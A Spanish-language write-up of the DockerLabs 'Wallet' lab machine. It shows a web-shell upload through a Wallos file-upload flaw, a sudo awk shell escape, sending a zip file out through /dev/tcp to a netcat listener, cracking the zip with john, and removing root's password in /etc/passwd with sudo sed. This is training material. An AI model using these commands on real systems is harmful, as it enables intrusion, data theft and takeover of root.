Wallet
Última actualización
Última actualización
Hoy realizamos la maquina Wallet de la plataforma DockerLabs
Autor: Pylon & El Pingüino de Mario
Dificultad: Medio
Comenzamos con un escaneo de nmap
:
nmap -sS -sV -sC --open --min-rate 5000 -n -Pn -p- -vvv 172.17.0.2 -oN escaneo.txt
# Nmap 7.95 scan initiated Sun Dec 15 22:21:33 2024 as: nmap -sS -sV -sC --open --min-rate 5000 -n -Pn -p- -vvv -oN escaneo.txt 172.17.0.2
Nmap scan report for 172.17.0.2
Host is up, received arp-response (0.000012s latency).
Scanned at 2024-12-15 22:21:34 -03 for 8s
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.59 ((Debian))
|_http-title: Wallet
| http-methods:
|_ Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.59 (Debian)
MAC Address: 02:42:AC:11:00:02 (Unknown)
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Dec 15 22:21:42 2024 -- 1 IP address (1 host up) scanned in 8.80 seconds
Al parecer nos enfrentamos a una maquina debian con un solo puerto abierto:
• Puerto 80: Apache httpd 2.4.59
Sabiendo esto continuamos desde el navegador.
Estando ahí, vemos una web que parece ser una plantilla, pero hay un botón que dice "Get A Quote" el cual si le damos, nos redirige a un dominio, el cual es panel.wallet.dl
, por lo que continuamos agregándolo al /etc/hosts
.
172.17.0.2 panel.wallet.dl
Una vez estamos en la web de panel.wallet.dl
, veremos un panel de registro, en el cual nos registramos con cualquier credencial y continuamos. Luego de iniciar sesión, vamos a about.php
, y veremos que hay una linea que dice lo siguiente:
Wallos v1.11.0
Por lo que luego de buscar, encuentro que se pueden subir archivos a través de una vulnerabilidad. Sabiendo esto, nos aprovechamos de ella siguiendo los pasos de la exploit-db. Que en resumen, es ir a "New Subscription", en donde podemos elegir un logo para la suscripción, subimos la shell en php que tengamos, y luego con burpsuite capturamos la peticion. Finalmente la modificamos para que quede como en la página de exploit-db y listo, nuestra shell estará subida. (Principalmente lo que se debe modificar es que el codigo tenga lo siguiente al principio: GIF89a;
)
Estando dentro como www-data, realizamos un tratamiento de la tty, y al ejecutar sudo -l
, veremos que podemos ejecutar el binario awk
como el usuario "pylon", por lo que luego de buscar, para escalar simplemente debemos ejecutar el siguiente comando:
sudo -u pylon awk 'BEGIN {system("/bin/bash")}'
Si vamos a la home del usuario pylon, veremos que hay un zip con contraseña, por lo que tendremos que pasarlo a nuestra maquina. Como python3 no está instalado, lo haremos usando /dev/tcp
. Para esto, debemos escuchar en nuestra maquina usando netcat
de la siguiente manera:
nc -nlvp 2323 > archivo.zip
luego, en la maquina victima ejecutar el siguiente comando:
cat secretitotraviesito.zip > /dev/tcp/172.17.0.1/2323
una vez lo hagamos, tendremos el zip en el host.
Ahora intentaremos sacar la contraseña usando zip2john
y john
, para esto primero sacamos el hash:
zip2john archivo.zip > hash
y luego lo rompemos con john
de la siguiente manera:
john --wordlist=/opt/rockyou.txt hash
luego de hacerlo, nos dirá que la contraseña del zip es "chocolate1
". Lo descomprimimos con unzip
y al leer la nota que nos deja, vemos lo siguiente:
pinguino:pinguinomaloteh
Por lo que ya tenemos credenciales para escalar al usuario pinguino
.
Siendo el usuario pinguino, podemos ejecutar sed
como root, por lo que para escalar simplemente modificamos el /etc/passwd
eliminando la x de root de la siguiente manera:
sudo sed -i 's/root:x:/root::/g' /etc/passwd
luego, ejecutamos su
y ya seremos root.
Gracias por leer :)